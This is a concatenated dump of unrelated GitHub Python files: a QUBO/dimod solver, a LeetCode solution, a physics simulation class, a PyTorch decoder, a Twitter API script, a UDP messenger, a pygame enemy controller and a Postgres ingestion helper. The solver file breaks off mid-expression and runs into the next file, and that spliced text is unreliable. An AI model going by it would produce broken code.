bestsym = sym\n\n return bestsym\n\ndef pick_value(syms):\n sym = find_best_sym(syms)\n offset = 0.1\n val = round(uniform(sym.bounds[0]+offset,sym.bounds[1]-offset),1)\n sym.updatebounds(val,val)\n \n #print(\"value picked for {}: {}\".format(sym.name,sym.value))\n return\n\ndef determine_symbol_values(syms):\n tighten_bounds(syms)\n system_solved = True\n for sym in syms:\n check = sym.isknown\n if check == False:\n system_solved = False\n\n #print(\"After first bound tightening\\n\\tNew bounds:\")\n #for sym in syms:\n # print(\"\\t\\t\",sym.name, sym.bounds)\n #print(\"\\n\")\n\n while system_solved == False:\n pick_value(syms)\n tighten_bounds(syms)\n #print(\"\\tNew bounds:\")\n #for sym in syms:\n # print(\"\\t\\t\",sym.name, sym.bounds)\n #print(\"\\n\")\n\n system_solved = True\n for sym in syms:\n check = sym.isknown\n if check == False:\n system_solved = False\n \n return syms\n\ndef solve(sys_ineq):\n syms = extract_symbols(sys_ineq)\n #print(\"After symbol initialization\\n\\tBounds:\")\n #for sym in syms:\n # print(\"\\t\\t\",sym.name, sym.bounds)\n #print(\"\\n\")\n\n determine_symbol_values(syms)\n\n return syms\n\ndef evaluate_sys(sys_ineq, syms):\n \n iscorrect = list()\n for ineq in sys_ineq:\n if '=' in ineq:\n relation = '='\n if '>' in ineq:\n relation = '>'\n if '<' in ineq:\n relation = '<'\n\n splitineq = str.split(ineq, relation)\n LHS = splitineq[0]\n RHS = splitineq[1]\n\n Llist = str.split(LHS, ' ')[:-1]\n Rlist = str.split(RHS, ' ')[1:]\n\n knowncount = 0\n for sym in syms:\n if sym.isknown == True:\n knowncount = knowncount + 1\n if knowncount == len(syms):\n allknown = True\n else:\n allknown = False\n\n Lval = 0\n for elem in Llist:\n for sym in syms:\n if elem == sym.name:\n Lval = Lval + sym.value\n if len(elem)>1:\n if elem[0] not in alpha and elem[1] in num:\n Lval = Lval + float(elem)\n\n\n Rval = 0\n for elem in Rlist:\n for sym in syms:\n if elem == sym.name:\n Rval = Rval + sym.value\n \n if len(elem)>1:\n if elem[0] not in alpha and elem[1] in num:\n Rval = Rval + float(elem)\n \n\n if relation == '=':\n iscorrect.append({'inequality': ineq, 'valid': round(float(Lval),1) == round(float(Rval),1)})\n if relation == '>':\n iscorrect.append({'inequality': ineq, 'valid': Lval > Rval})\n if relation == '<':\n iscorrect.append({'inequality': ineq, 'valid': Lval < Rval})\n\n \n return iscorrect\n \ndef evaluate_constraints(syms):\n pass\n\n\ndef main():\n \n # XOR encoding (4 bit)\n system_inequalities = ['0 = G',\n 'w0 > G',\n 'w1 > G',\n 'w1 + J01 + w0 > G',\n 'w2 > G',\n 'w2 + J02 + w0 > G',\n 'w2 + J12 + w1 = G',\n 'w2 + J12 + J02 + w1 + J01 + w0 > G',\n 'w3 > G',\n 'w3 + J03 + w0 > G',\n 'w3 + J13 + w1 = G',\n 'w3 + J13 + J03 + w1 + J01 + w0 > G',\n 'w3 + J23 + w2 > G',\n 'w3 + J23 + J03 + w2 + J02 + w0 = G',\n 'w3 + J23 + J13 + w2 + J12 + w1 > G',\n 'w3 + J23 + J13 + J03 + w2 + J12 + J02 + w1 + J01 + w0 > G']\n\n inputs = ['w2','w3']\n outputs = ['w1'] \n \n \n '''\n # XNOR encoding (4 bit)\n system_inequalities = ['0 > G',\n 'w0 > G',\n 'w1 = G',\n 'w1 + J01 + w0 > G',\n 'w2 = G',\n 'w2 + J02 + w0 > G',\n 'w2 + J12 + w1 > G',\n 'w2 + J12 + J02 + w1 + J01 + w0 > G',\n 'w3 = G',\n 'w3 + J03 + w0 > G',\n 'w3 + J13 + w1 > G',\n 'w3 + J13 + J03 + w1 + J01 + w0 > G',\n 'w3 + J23 + w2 > G',\n 'w3 + J23 + J03 + w2 + J02 + w0 > G',\n 'w3 + J23 + J13 + w2 + J12 + w1 > G',\n 'w3 + J23 + J13 + J03 + w2 + J12 + J02 + w1 + J01 + w0 = G',\n 'w3 = -50',\n 'w2 = -50',\n 'w1 = -50',\n 'w0 = 500',\n 'J02 = -300',\n 'J23 = 80',\n 'J12 = 100',\n 'J13 = 100']\n \n inputs = ['w2','w3']\n outputs = ['w1']\n '''\n '''\n #Test toffoli\n system_inequalities = ['w2 = 6313.9',\n 'w1 = 1930.2',\n 'J14 = -1926.5', \n 'J03 = -1503.0', \n 'J01 = 8625.9',\n 'J23 = 14.3',\n 'J04 = -5659.2',\n 'J24 = 1926.5',\n 'J12 = -8244.1',\n 'w4 = 0.0',\n 'J02 = -9566.3',\n 'w0 = 8463.2',\n 'J34 = 10.6',\n 'w3 = 0.0', \n 'J13 = -14.3']\n\n inputs = ['w4','w3','w2']\n outputs = ['w1']\n '''\n############################################\n############################################\n\n besttruecount = 0\n\n stop = False\n count = 0\n while stop == False: \n shuffle(system_inequalities)\n symbols = solve(system_inequalities)\n \n correct = evaluate_sys(system_inequalities, symbols)\n truecount = 0\n falses = list()\n for elem in correct:\n #print(elem['valid'], \"\\t-\", elem['inequality'])\n if elem['valid']==True:\n truecount = truecount + 1\n else:\n falses.append(elem['inequality'])\n #print(\"\\n\")\n\n if truecount >= besttruecount:\n best = list()\n for sym in symbols:\n a = [sym.name, sym.value]\n best.append(a) \n besttruecount = truecount\n #print('best: ', besttruecount)\n bestfalse = falses\n if truecount == len(correct): \n stop = True\n \n count = count + 1\n\n if count % 200 == 0:\n s = input('Tried {} times. Stop? (y/n) '.format(count))\n if s == 'y':\n stop = True\n elif s == 'n':\n stop = False\n else:\n stop = False\n print(count)\n \n print(\"\\nSymbol Values: \")\n for entry in best:\n print(\"\\t\",entry[0],\"\\t\",entry[1])\n\n print('{} were true, {} were false:'.format(besttruecount,len(system_inequalities)-besttruecount))\n for i in range(len(bestfalse)):\n print('False: ', bestfalse[i])\n\n import dimod\n\n qubit=list()\n qubitweight =list()\n coupler=list()\n couplerweight=list()\n offset = 0\n \n for sym in symbols:\n if 'w' in sym.name:\n qubit.append(sym.name)\n qubitweight.append(sym.value)\n if 'J' in sym.name:\n numbers = sym.name[1:]\n coupler.append(('w{}'.format(numbers[0]), 'w{}'.format(numbers[1])))\n couplerweight.append(sym.value)\n if sym.name == 'offset':\n offset = sym.value\n\n qubit_weights = {q:w for q,w in zip(qubit, qubitweight)}\n coupler_weights = {c:w for c,w in zip(coupler,couplerweight)}\n\n print(qubit_weights,coupler_weights)\n\n bqm = dimod.BinaryQuadraticModel(qubit_weights, coupler_weights, offset, dimod.BINARY)\n sampler = dimod.ExactSolver()\n response = sampler.sample(bqm)\n\n groundstate = 1000000\n for sample, energy in response.data(['sample','energy']):\n if energy' + i for i in self.binaryTreePaths(root.left)]\n\n if root.right:\n result += [str(root.val) + '->' + i for i in self.binaryTreePaths(root.right)]\n\n if not root.left and not root.right:\n result += [str(root.val)]\n\n return result\n","repo_name":"LYZhelloworld/Leetcode","sub_path":"binary-tree-paths/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13868906549","text":"from .neutrino import Neutrino\nfrom ..particle_masses import *\nfrom ..utils import get_two_body_momenta\nfrom .particle import Particle\nfrom .electron import Electron\nfrom .tau import Tau\nfrom .hnl import HNL\nfrom ..mixing_type import MixingType\nfrom ..utils import get_two_body_momenta\n\nclass DsMeson(Particle):\n def __init__(self, beam=None, parent=None, momenta=[]):\n super().__init__(DS_MASS, beam, parent, momenta)\n\n def __decay_tau_mixing(self, hnl_mass):\n tau = Tau(parent=self, beam=self.beam)\n other_particle = Neutrino(parent=self, beam=self.beam)\n if TAU_MASS + hnl_mass < DS_MASS:\n # HNL mass is small enough to produce an HNL here\n other_particle = HNL(hnl_mass, beam=self.beam, parent=self)\n \n tau_rest_momenta = get_two_body_momenta(self, tau, other_particle, self.beam.num_samples)\n\n tau.set_momenta(tau_rest_momenta).boost(self.momenta)\n\n tau.decay(hnl_mass)\n\n if isinstance(other_particle, HNL):\n hnl_rest_momenta = get_two_body_momenta(self, other_particle, tau, self.beam.num_samples)\n other_particle.set_momenta(hnl_rest_momenta).boost(self.momenta)\n other_particle.decay()\n\n self.children.append(other_particle)\n self.children.append(tau)\n \n\n def __decay_electron_mixing(self, hnl_mass):\n electron = Electron(parent=self, beam=self.beam)\n hnl = HNL(hnl_mass, beam=self.beam, parent=self)\n \n hnl_rest_momenta = get_two_body_momenta(self, hnl, electron, self.beam.num_samples)\n hnl.set_momenta(hnl_rest_momenta).boost(self.momenta)\n hnl.decay()\n\n self.children.append(hnl)\n self.children.append(electron)\n\n def decay(self, hnl_mass):\n # D -> N + lepton (electron, muon, tau)\n if self.beam.mixing_type == MixingType.electron and hnl_mass + ELECTRON_MASS < DS_MASS:\n self.__decay_electron_mixing(hnl_mass)\n elif self.beam.mixing_type == MixingType.tau:\n self.__decay_tau_mixing(hnl_mass)\n return self","repo_name":"ryanbarouki/HNL_Dump","sub_path":"src/particles/DsMeson.py","file_name":"DsMeson.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30668080376","text":"import torch\nfrom torch import nn\n\n\nclass SDecoder(nn.Module):\n def __init__(self, colour_channels, code_features, n_filters=32, n_layers=4, kernel_size=3):\n super().__init__()\n\n self.in_conv = nn.Sequential(\n nn.Conv2d(code_features, n_filters, kernel_size, padding=kernel_size // 2, padding_mode='reflect'),\n nn.ReLU())\n\n self.hidden_convs = nn.ModuleList(\n [nn.Conv2d(n_filters, n_filters, kernel_size, padding=kernel_size // 2, padding_mode='reflect'),\n nn.ReLU()] * (n_layers - 2))\n\n self.out_conv = nn.Conv2d(n_filters * 2, colour_channels, kernel_size, padding=kernel_size // 2,\n padding_mode='reflect')\n\n def forward(self, s_code):\n s_code = self.in_conv(s_code)\n skip = s_code\n\n for layer in self.hidden_convs:\n s_code = layer(s_code)\n\n s_code = torch.cat((s_code, skip), dim=1)\n s = self.out_conv(s_code)\n\n return s\n\n def get_s(self, s_code, x):\n s = self.forward(s_code)\n mse = (s - x) ** 2\n return s, mse\n","repo_name":"anonymous-octopus/Unsupervised-Structured-Noise-Removal-with-Variational-Lossy-Autoencoder","sub_path":"decoder/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12735181780","text":"import requests\nimport json\n\ndef searchApi(product):\n\n url = \"https://gnip-api.twitter.com/search/%s/accounts/viralnation/prod/counts.json\" % product\n\n\n headers= {\n \"Content-Type\": \"application/json\",\n }\n\n\n payload = json.dumps({\n \"query\": \"from:sachin_rt\",\n \"fromDate\":\"200603210000\",\n \"bucket\":\"day\"\n })\n\n response = requests.request(\"POST\", url, headers=headers, data = payload, auth=('', ''))\n\n resp = json.loads(response.text)\n print(response.text)\n\n\n\n\n# searchApi(\"30day\")\nsearchApi(\"fullarchive\")\n","repo_name":"AkhilKurian30/Twitter-Stream-Api-Using-AWS-Kinesis","sub_path":"TwitterEngagementsAPI/count-api.py","file_name":"count-api.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9915765880","text":"#Program to encrypt a message by converting all lowercase characters to the next character.\n#BRXCAI001\n#09 MAY 2014\n\nmessage = input(\"Enter a message:\\n\")\n\ndef encrypt(message):\n #Encrypt function only converts lowercase characters so first check to see if it is a lower case.\n if message[0].islower():\n #Only when message is one character. \n if len(message) == 1:\n #Accomodating for the case when that one charcater is z as you cannot encrypt z as the ordinal \"27\" does not exist.\n if message[0]== \"z\":\n return \"a\"\n #If the message is one character but that character is not z.\n else:\n #Adding 1 to the ordinal so that the corresponding character is the following alphabetical letter.\n return chr(ord(message[0])+1)\n #When message is more than one character but starts with z.\n elif message[0]== \"z\": \n return \"a\" + encrypt(message[1:])\n #General case when the message is more than one character long and does not start with z.\n else:\n return chr(ord(message[0])+1) + encrypt(message[1:])\n \n #Accomdates for characters in message which are not lowercase.\n else:\n #If the message is only one character long.\n if len(message) == 1: \n return message[0]\n #If the message is more than one character long but starts with an uppercase. \n else: \n return message[0] + encrypt(message[1:])\n \nprint(\"Encrypted message:\\n\", encrypt(message), sep=\"\")","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/brxcai001/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3370425664","text":"# -*- coding: utf-8 -*-\nwhile True:\n\tvalue = int(input())\n\tif value == 0:\n\t\tbreak\n\tnumero = 0\n\tfor linha in range(value):\n\t\tfor coluna in range(value):\n\t\t\tif value%2 == 0:\n\t\t\t\tref = 'par'\n\t\t\telse:\n\t\t\t\tref = 'impar'\n\t\t\tepct = value//2\n\t\t\tif linha == coluna:\n\t\t\t\tnumero+=1\n\t\t\tprint('\\t',end=\"\")\n\t\t\tprint(numero,end=\"\")\n\t\tprint('\\n')\n#\tprint('\\n')\n","repo_name":"rfaprofeta/urijudgeonline","sub_path":"uri1431.py","file_name":"uri1431.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31455967983","text":"#!/usr/bin/python3\n\n## This program has two functions:\n## 1) Send message 2) Receive message\n## I wrote this program to understant how udp socket works with Python. \n## Two options control the behaviours of this program:\n## 1) -s (sending) 2) -r (receiving message)\n## I also leaned how to use \"argparse model\". \n\nimport argparse\nimport socket\n\n# process options\ndef option():\n parser = argparse.ArgumentParser()\n parser.add_argument('-s',help='Send message',action='store_true')\n parser.add_argument('-r',help='Receive message',action='store_true')\n parser.add_argument('--ip',help='IP address')\n parser.add_argument('--port',help='Port',type=int)\n args=parser.parse_args()\n return args\n\n# send message\ndef sender(ip,port):\n message=input('Message(EXIT to exit): ')\n if message == 'EXIT':\n sys.exit()\n else:\n udp_socket.sendto(message.encode(),(ip, port))\n udp_socket.close\n\n# Message receiver\ndef receiver(port):\n udp_socket.bind(port)\n while True:\n data=udp_socket.recvfrom(4096)\n message=data[0]\n print(message.decode())\n udp_socket.close\n\n\n# Create a Socket\nudp_socket=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# Main\nargs=option()\n\nif args.s:\n ip=args.ip\n port=args.port\n while True:\n sender(ip,port)\n\nif args.r:\n port=args.port\n port=('',port)\n receiver(port)\n\n\n\n \n\n \n\n\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"yongtanggit/networking","sub_path":"socket/udp/udp_messenger.py","file_name":"udp_messenger.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71674147009","text":"## @file controller.py\n# @title Enemy\n# @author Alex Lo\n# @date April 06, 2019\n\n\n# Imports\nimport pygame\nimport input\nimport projectile\nimport game\nimport sprite\nimport map\nfrom random import randint\nfrom random import choice\n\nfrom .abstract import *\n# image, hp, speed, damage\n#ENEMYDATA = [image, 3, 3, 0]\n\nSPRITES = ['Food/assets/EnemySprites/Avocado.png',\n 'Food/assets/EnemySprites/Bacon.png',\n 'Food/assets/EnemySprites/Carrot.png',\n 'Food/assets/EnemySprites/Cherry.png',\n 'Food/assets/EnemySprites/Corn.png',\n 'Food/assets/EnemySprites/Dragonfruit.png',\n 'Food/assets/EnemySprites/Egg.png',\n 'Food/assets/EnemySprites/Hamburger.png',\n 'Food/assets/EnemySprites/Orange.png',\n 'Food/assets/EnemySprites/Pancake.png',\n 'Food/assets/EnemySprites/Pizza.png',\n 'Food/assets/EnemySprites/Ramen.png',\n 'Food/assets/EnemySprites/Soda.png',\n 'Food/assets/EnemySprites/Toast.png',\n 'Food/assets/EnemySprites/Tomato.png',\n 'Food/assets/EnemySprites/Watermelon.png']\n\nSTEP = (2048,2048)\nSIZE = (2048,2048)\n\n\nclass EnemyController():\n\n # pass enemy sprite info and attack info as a list.\n def __init__(self, cList):\n\n self.enemies = []\n\n self.sprites = []\n\n for sheet in SPRITES:\n temp = sprite.extractSprites(sheet, SIZE, STEP)\n self.sprites.append(pygame.transform.scale(temp[0],(64,64)))\n\n\n self.data = [[1, 2, 1],\n [2, 3, 2],\n [3, 4, 2]]\n\n\n #set collision list\n self.cList = cList\n\n\n def spawnEnemies(self, sc, level):\n\n for i in range(randint(1 * (level+1), 5 * (level+1))):\n self.enemies.append(Enemy(choice(self.sprites),\n self.data[level],\n (randint(130,1000), randint(130,800))))\n self.renderEnemies(sc)\n\n def killall(self, sc):\n for enemy in self.enemies:\n sc.remove(enemy)\n enemy.kill()\n\n def renderEnemies(self,sc):\n for enemy in self.enemies:\n sc.add(enemy)\n\n def setEnemyPosition(self, Enemy, x, y):\n enemy.rect.x = x\n enemy.rect.y = y\n\n\n################################################################################\n# Movement #\n################################################################################\n\n\n def moveX(self, enemy, speedX):\n enemy.rect.x += speedX\n\n\n def moveY(self, enemy, speedY):\n enemy.rect.y += speedY\n\n\n\n###############################################################################\n# Collision Rules #\n###############################################################################\n\n def checkCollision(self, enemy):\n\n collisions = pygame.sprite.spritecollide(enemy, self.cList, False)\n\n for i in collisions:\n\n if (i.id == game.ID.WALL or i.id == game.ID.STRUCTURE):\n self.collideWall(enemy,i)\n\n\n def collideWall(self, enemy, wall):\n\n if (enemy.oldx + enemy.rect.width <= wall.rect.x):\n enemy.rect.x = wall.rect.x - enemy.rect.width\n\n elif (enemy.oldx >= wall.rect.x + wall.rect.width):\n enemy.rect.x = wall.rect.x + wall.rect.width\n\n elif (enemy.oldy + enemy.rect.height <= wall.rect.y):\n enemy.rect.y = wall.rect.y - enemy.rect.height\n\n elif (enemy.oldy >= wall.rect.y + wall.rect.height):\n enemy.rect.y = wall.rect.y + wall.rect.height\n\n\n def moveToPlayer(self, player, enemy):\n\n xDiff = player.pos[0] - enemy.rect.x\n yDiff = player.pos[1] - enemy.rect.y\n enSpeed = enemy.speed\n\n if (xDiff > enSpeed):\n self.moveX(enemy,enSpeed)\n\n elif (xDiff < -enSpeed):\n self.moveX(enemy,-enSpeed)\n\n elif (abs(xDiff) <= enSpeed):\n self.moveX(enemy,xDiff)\n\n if (yDiff > enSpeed):\n self.moveY(enemy,enSpeed)\n\n elif (yDiff < -enSpeed):\n self.moveY(enemy,-enSpeed)\n\n elif (abs(yDiff) <= enSpeed):\n self.moveY(enemy,yDiff)\n\n def update(self, player, sc, ic):\n\n for enemy in self.enemies:\n\n enemy.oldx = enemy.rect.x\n enemy.oldy = enemy.rect.y\n\n self.moveToPlayer(player, enemy)\n\n self.checkCollision(enemy)\n\n if enemy.hp <= 0:\n enemy.kill()\n self.enemies.remove(enemy)\n ic.spawnItem(sc, enemy.oldx, enemy.oldy)\n\n enemy.frame += 1\n","repo_name":"Babarbitz/Project-Food","sub_path":"Food/src/enemy/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10923547650","text":"import os\nimport datetime\nimport requests \nimport csv\nimport psycopg2\n\nclass DB(object):\n\n def __init__(self):\n self.connstr = os.environ.get('ingressconnectionstring', None)\n\n\n def get_connection(self):\n if self.connstr:\n return psycopg2.connect(self.connstr)\n else:\n return psycopg2.connect(\n dbname='ingress',\n user='cameron',\n password=''\n )\n\n\n def insert_rows(self, file_object, table_name):\n\n conn = None\n copy_statement = \"\"\"\n COPY %s FROM STDIN WITH\n CSV\n HEADER\n DELIMITER AS ','\n \"\"\"\n\n try:\n conn = self.get_connection()\n cur = conn.cursor()\n\n print(\"Copying data into\", table_name)\n cur.copy_expert(sql=copy_statement % table_name, file=file_object)\n\n conn.commit()\n cur.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n\n\n def execute_sql(self, sql, params=None):\n # print(\"Executing sql:\", sql)\n try:\n conn = self.get_connection()\n cur = conn.cursor()\n sql_args = list(filter(lambda v: v is not None, [sql, params]))\n # print(\"SQL_ARGS:\", sql_args)\n cur.execute(*sql_args)\n conn.commit()\n rows = []\n if cur.description != None:\n rows = cur.fetchall()\n cur.close()\n return rows\n except (Exception, psycopg2.DatabaseError) as error:\n if str(error) != 'no results to fetch':\n print(\"SQL Error >>\", error)\n raise Exception('SQL error {}'.format(error)) \n finally:\n if conn and conn is not None:\n conn.close()\n\n\n def create_table(self, csv_record, columns):\n table_name = '_' + str(datetime.datetime.now())\n \n table_name = table_name.replace('-', '_') \\\n .replace(' ', '_at_') \\\n .replace(':', '_') \\\n .replace('.', '_')\n\n print(\"Creating table:\", table_name)\n sql = 'create table if not exists ' + table_name + \" (\" + \" VARCHAR(400),\".join(columns) + \" VARCHAR(400))\"\n rows = self.execute_sql(sql)\n\n return table_name\n\n\n def check_url(self, url):\n result = self.execute_sql(\"\"\"select id from tables_index where csv_url = %s\"\"\", [url])\n print(\"URL Lookup:\", result, url)\n if len(result) > 0:\n return False\n else:\n return True\n\n\n def get_next_record(self):\n sql = '''\n update tables_index\n set \n state = 1, parsed_at = '{}'\n where \n id = (\n select id from tables_index\n where state = 0 \n order by inserted_at asc\n limit 1\n )\n returning id, csv_url, parse_attempts\n '''.format(datetime.datetime.now())\n\n resp = self.execute_sql(sql)\n if resp:\n return dict( zip(('id', 'csv_url', 'parse_attempts'), resp.pop()))\n else:\n return False\n\n\n def parse_failed(self, record):\n print(\"Parsing failed for:\", record)\n sql = '''\n update tables_index\n set \n state = 3, failed_at = '{}', parse_attempts = {}\n where \n id = {}\n '''.format(datetime.datetime.now(), record['parse_attempts'] + 1, record['id'])\n\n self.execute_sql(sql)\n\n\n def parse_succeeded(self, record):\n print(\"Parsing succeeded for:\", record)\n sql = '''\n update tables_index\n set \n state = 2, succeeded_at = '{}', parse_attempts = {}\n where \n id = {}\n '''.format(datetime.datetime.now(), record['parse_attempts'] + 1, record['id'])\n\n self.execute_sql(sql)\n\n\n def set_table_name(self, record, table_name):\n sql = '''\n update tables_index\n set \n table_name = '{}'\n where \n id = {}\n '''.format(table_name, record['id'])\n\n self.execute_sql(sql)\n","repo_name":"zachChilders/deanonymization","sub_path":"ingress/app/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"25335106895","text":"\ndef check(a, b, c):\n if a * a + b * b == c * c:\n return True\n else:\n return False\ntot = 1000\nfor a in range(1, 1000):\n for b in range(a + 1, 1000):\n #because we know a + b + c = 1000\n c = tot - a - b \n if check(a, b, c) == True:\n print(a * b * c)\n break\n \n \n\n \n","repo_name":"jacksonliao78/projecteuler","sub_path":"9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22159492037","text":"def ViewMenu():\n print(\"\\n==========Выберете операцию=============\\n\"\n \"1. Просмотреть заметки\\n\"\n \"2. Создать заметки\\n\"\n \"3. Выйти\")\n num = int(input(\"Выберите пункт меню: \"))\n return num\n\ndef ViewWrite():\n print(\"\\n==========Выберете операцию=============\\n\"\n \"1. Сохранить в файл и выйти \\n\"\n \"2. Продолжить работу с заметками\\n\"\n \"3. Выйти без сохранения\")\n num = int(input(\"Выберите пункт меню: \"))\n return num\n\ndef WorkMenu():\n print(\"\\n==========Введите операцию=============\\n\"\n \"1. Добавить запись\\n\"\n \"2. Редактировать запись\\n\"\n \"3. Удалить запись\\n\"\n \"4. Вывести все запись\\n\"\n \"5. Выйти\")\n \n key = int(input(\"Выберите пункт меню: \"))\n return key\n","repo_name":"ColdSun93/Control_work_specialization","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36283944978","text":"class Solution:\n\tdef asteroidCollision(self, asteroids: List[int]) -> List[int]:\n\t\t\"\"\"\n\t\tWe can solve this problem using a stack. We iterate through the asteroids from left to right, and for each asteroid, we perform the following steps:\n\t\t1. If the asteroid is moving to the right (i.e., positive), we simply append it to the stack since it cannot collide with any previous asteroid.\n\t\t2. If the asteroid is moving to the left (i.e., negative), we need to compare it with the top of the stack to see if they will collide. We keep popping elements from the stack until one of the following conditions is met:\n\t\t- The stack is empty, in which case the current asteroid survives since there is no asteroid to collide with.\n\t\t- The top of the stack is negative, in which case the current asteroid survives since it is moving to the left and cannot collide with any previous asteroid.\n\t\t- The top of the stack is positive and has a larger size than the current asteroid, in which case the current asteroid is destroyed since it is smaller and moving to the left.\n\t\t- The top of the stack is positive and has a smaller or equal size than the current asteroid, in which case both asteroids are destroyed since they have the same size or the current asteroid is larger and destroys the previous asteroid.\n\t\t3. After all the asteroids have been processed, the stack will contain the surviving asteroids. We can return the stack as the final result\n\t\t\"\"\"\n\t\tstack = []\n\t\tfor asteroid in asteroids:\n\t\t\tif asteroid > 0:\n\t\t\t\tstack.append(asteroid)\n\t\t\telse: # when we have a negative asteroid\n\t\t\t\twhile stack and stack[-1] > 0 and stack[-1] < abs(asteroid):\n\t\t\t\t\tstack.pop()\n\t\t\t\tif not stack or stack[-1] < 0:\n\t\t\t\t\tstack.append(asteroid)\n\t\t\t\telif stack[-1] == abs(asteroid):\n\t\t\t\t\tstack.pop()\n\n\t\treturn stack\n# time: O(n) = space, n is length of arr\n","repo_name":"tramnhatquang/LeetCode-Solutions-Python","sub_path":"735. Asteroid Collision.py","file_name":"735. Asteroid Collision.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"36858894728","text":"from os import system\nfrom time import sleep\nnbl = open('data.txt').read()\n\ntotal = 0\ntetris = [['####'], ['.#.', '###', '.#.'], ['..#', '..#', '###'], ['#', '#', '#', '#'], ['##', '##']]\nhighr = 0\nlvl = []\nsizem = 7\n\ndef horizontal(curform, dire):\n\tforme = curform['forme']\n\tx = curform['x']\n\ty = curform['y']\n\tif dire == '>':\n\t\tfor ilmn, lmn in enumerate(forme):\n\t\t\tmaxr = x + len(lmn) if lmn[-1] == '#' else x + len(lmn) - 1\n\t\t\tif maxr >= sizem:\n\t\t\t\treturn False\n\t\t\telif lvl[y - ilmn][maxr] == '#':\n\t\t\t\treturn False\n\t\tdraw(curform, True)\n\t\tcurform['x'] += 1\n\telif dire == '<':\n\t\tfor ilmn, lmn in enumerate(forme):\n\t\t\tif lmn[0] == '#':\n\t\t\t\tminr = x - 1\n\t\t\telif lmn[1] == '#':\n\t\t\t\tminr = x\t\n\t\t\telif lmn[2] == '#':\n\t\t\t\tminr = x + 1\t\n\t\t\tif minr < 0:\n\t\t\t\treturn False\n\t\t\telif lvl[y - ilmn][minr] == '#':\n\t\t\t\treturn False\n\t\tdraw(curform, True)\n\t\tcurform['x'] -= 1\n\treturn True\n\ndef goingdown(curform):\n\tglobal highr\n\tforme = curform['forme']\n\tx = curform['x']\n\ty = curform['y']\n\tdraw(curform, True)\n\n\tif y - len(forme) < 0:\n\t\thighr = max(highr, y + len(forme))\n\t\treturn False \n\tfor ix in range(len(forme[0])):\n\t\typos = len(forme) if forme[-1][ix] == '#' else len(forme) - 1\n\t\tif lvl[y - ypos][x + ix] == '#':\n\t\t\thighr = max(highr, y + 1)\n\t\t\treturn False\n\tcurform['y'] -= 1\n\treturn True\n\nindex = -1\ndef drawit(curform):\n#\tsystem('clear')\n\tdraw(curform, False)\n#\tfor li in range(len(lvl) - 1, -1, -1):\n#\t\tprint(lvl[li])\n\t\t#for l in lvl[li]:\n\t\t#\tprint(l, end = '')\n\t\t#print()\n#\tsleep(0.04)\n#\tprint()\n\ndef draw(curform, clean):\n\tforme = curform['forme']\n\tx = curform['x']\n\ty = curform['y']\n\tfor islide, slide in enumerate(forme):\n\t\tfor ixx, xx in enumerate(slide):\n\t\t\tif clean and forme[islide][ixx] != '.':\n\t\t\t\tlvl[y - islide][x + ixx] = '.'\n\t\t\telif lvl[y - islide][x + ixx] == '.':\n\t\t\t\tlvl[y - islide][x + ixx] = forme[islide][ixx]\n\ndef addup(curf):\n\thg = 3 - (len(lvl) - highr - len(curf['forme']))\n\tif hg < 0:\n\t\thg = 0\n\tfor _ in range(hg):\n\t\tlvl.append(['.' for _ in range(7)])\n\ngd = False\nwindi = 0\nmaxrok = 2022\nwhile index < maxrok:\n\tc = nbl[windi % len(nbl)]\n\tif gd == False:\n\t\tindex += 1\n\t\tcurform = {'forme': tetris[index % 5], 'y': 0, 'x': 2}\n\t\tdif = 3 - (len(lvl) - highr - len(curform['forme']))\n\t\tdif = 0 if dif > 0 else dif\n\t\taddup(curform)\n\t\tcurform['y'] = len(lvl) - 1 + dif\n\t\tdrawit(curform)\n\tho = horizontal(curform, c)\n\tdrawit(curform)\n\tgd = goingdown(curform)\n\tdrawit(curform)\n\twindi += 1\n\nprint('Part 1: {}'.format(highr))","repo_name":"AFeuillet/CodingGames","sub_path":"AOC/2022/day17/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37201165041","text":"# -*- coding:utf-8 -*-\n__author__ = 'mering Gao'\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG, format='%(levelname)s (%(threadName)-10s) %(message)s', )\n# multiprocessing模块包含一个API,它基于threading API可以在多个进程间划分工作,\n# 有些情况下,multiprocessing可以作为临时替换,取代threading来利用多个cpu内核\n# 